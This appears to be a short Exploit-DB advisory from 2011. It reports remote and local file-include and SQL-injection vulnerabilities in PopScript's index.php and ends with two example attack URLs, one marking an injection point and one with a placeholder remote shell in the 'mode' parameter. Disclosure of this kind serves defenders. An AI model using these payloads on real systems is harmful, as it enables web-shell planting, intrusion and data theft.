PopScript - 'index.php' Multiple Input Validation Vulnerabilities

EDB-ID:

35831

CVE:

N/A


Author:

NassRawI

Type:

webapps


Platform:

PHP

Date:

2011-06-06


source: https://www.securityfocus.com/bid/48113/info

PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 

http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON